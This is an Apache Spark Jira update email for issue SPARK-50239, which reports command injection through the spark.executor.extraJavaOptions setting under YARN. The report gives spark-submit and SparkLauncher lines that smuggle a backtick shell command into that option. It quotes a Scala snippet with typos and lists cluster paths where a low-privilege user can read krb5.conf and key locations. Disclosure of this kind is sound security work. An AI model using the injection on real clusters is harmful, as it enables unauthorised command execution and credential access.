[
https://issues.apache.org/jira/browse/SPARK-50239?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Zijie updated SPARK-50239:
--------------------------
Description:
* Attack Path
First, we need to obtain regular user privileges and construct a JAR file
according to custom rules.When yarn submits a task, I put a command-injection
string on a parameter named "spark.executor.extraJavaOptions", it's about
"\'touch\$IFS/tmp/zzz123\'"
There are two ways to submit parameters:
# Using command lines:spark-submit --class JavaWordCount --master yarn
--deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
# Using java API:sparkLauncher.setConf("spark.executor.extraJavaOptions",
"`touch$IFS/tmp/zzz123`");
We may find command-injection logs in hadoop.
I found the vulnerability exposed in file `ExexcutorRunnable.scale`:
//Set extra Java options for the executor, if defined
...
sparkConf.get(EXECUTOR_JAVA_OPTIONS).foreach{ opt =>
val subsOpt = Utils.subtitudeAppNExecIds(opts, appId, executorId)
javaOpts ++=
Utils.splitCommandString(subsOpt).map(YarnSparkHadopUtil.escapeForShell)
}{{{}{}}}
CVSS score: 8.8(AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
In the directory {{{}Bigdata/common/runtime/security{}}}, there are security
configurations, and the {{krb5.conf}} file is readable by the {{{}ldapuser{}}},
with the key location accessible.
In {{{}Bigdata/FusionInsight_Current/1_5_DataNode/install/hadoop{}}}, the
{{ldapuser}} has read and execute permissions, allowing the execution of
commands such as {{{}hadoop{}}}, {{{}hdfs{}}}, and {{{}yarn{}}}.
In {{{}Bigdata/FusionInsight_Current/1_6_NodeManager/etc{}}}, the {{ldapuser}}
has read permissions, and there are business configurations present.
In {{{}Bigdata/FusionInsight_Current/1_6_NodeManager/install/hadoop{}}}, the
{{ldapuser}} has read and execute permissions, allowing the execution of
commands such as {{{}hadoop{}}}, {{{}hdfs{}}}, and {{{}yarn{}}}.
In {{{}Bigdata/FusionInsight_Current/1_8_RegionServer{}}}, the {{ldapuser}} has
read permissions on a few files, and there are business configurations present.
was:
* Attack Path
!image-2024-11-06-11-43-13-321.png|width=285,height=315!
* How to attack?
When yarn submits a task, I put a command-injection string on a parameter named
"spark.executor.extraJavaOptions"
!image-2024-11-06-14-35-49-525.png|width=485,height=258!
There are two ways to submit parameters:
# Using command lines:spark-submit --class JavaWordCount --master yarn
--deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
# Using java API:sparkLauncher.setConf("spark.executor.extraJavaOptions",
"`touch$IFS/tmp/zzz123`");
We may find command-injection logs in hadoop:
!image-2024-11-06-14-43-46-128.png|width=495,height=298!
*How to exploit?*
!image-2024-11-06-14-46-16-914.png|width=445,height=42!
I found the vulnerability exposed in code:
!image-2024-11-06-14-50-06-477.png|width=535,height=292!
CVSS score:
!image-2024-11-06-14-56-36-042.png|width=562,height=175!
> JavaOptions Injection Issue
> ---------------------------
>
> Key: SPARK-50239
> URL: https://issues.apache.org/jira/browse/SPARK-50239
> Project: Spark
> Issue Type: Improvement
> Components: Spark Submit, YARN
> Affects Versions: 3.5.1
> Reporter: Zijie
> Priority: Major
>
> * Attack Path
> First, we need to obtain regular user privileges and construct a JAR file
> according to custom rules.When yarn submits a task, I put a command-injection
> string on a parameter named "spark.executor.extraJavaOptions", it's about
> "\'touch\$IFS/tmp/zzz123\'"
> There are two ways to submit parameters:
> # Using command lines:spark-submit --class JavaWordCount --master yarn
> --deploy-mode client --conf
> spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
> # Using java API:sparkLauncher.setConf("spark.executor.extraJavaOptions",
> "`touch$IFS/tmp/zzz123`");
> We may find command-injection logs in hadoop.
> I found the vulnerability exposed in file `ExexcutorRunnable.scale`:
> //Set extra Java options for the executor, if defined
> ...
> sparkConf.get(EXECUTOR_JAVA_OPTIONS).foreach{ opt =>
> val subsOpt = Utils.subtitudeAppNExecIds(opts, appId, executorId)
> javaOpts ++=
> Utils.splitCommandString(subsOpt).map(YarnSparkHadopUtil.escapeForShell)
> }{{{}{}}}
> CVSS score: 8.8(AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
> In the directory {{{}Bigdata/common/runtime/security{}}}, there are security
> configurations, and the {{krb5.conf}} file is readable by the
> {{{}ldapuser{}}}, with the key location accessible.
> In {{{}Bigdata/FusionInsight_Current/1_5_DataNode/install/hadoop{}}}, the
> {{ldapuser}} has read and execute permissions, allowing the execution of
> commands such as {{{}hadoop{}}}, {{{}hdfs{}}}, and {{{}yarn{}}}.
> In {{{}Bigdata/FusionInsight_Current/1_6_NodeManager/etc{}}}, the
> {{ldapuser}} has read permissions, and there are business configurations
> present.
> In {{{}Bigdata/FusionInsight_Current/1_6_NodeManager/install/hadoop{}}}, the
> {{ldapuser}} has read and execute permissions, allowing the execution of
> commands such as {{{}hadoop{}}}, {{{}hdfs{}}}, and {{{}yarn{}}}.
> In {{{}Bigdata/FusionInsight_Current/1_8_RegionServer{}}}, the {{ldapuser}}
> has read permissions on a few files, and there are business configurations
> present.
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org
For additional commands, e-mail: issues-h...@spark.apache.org
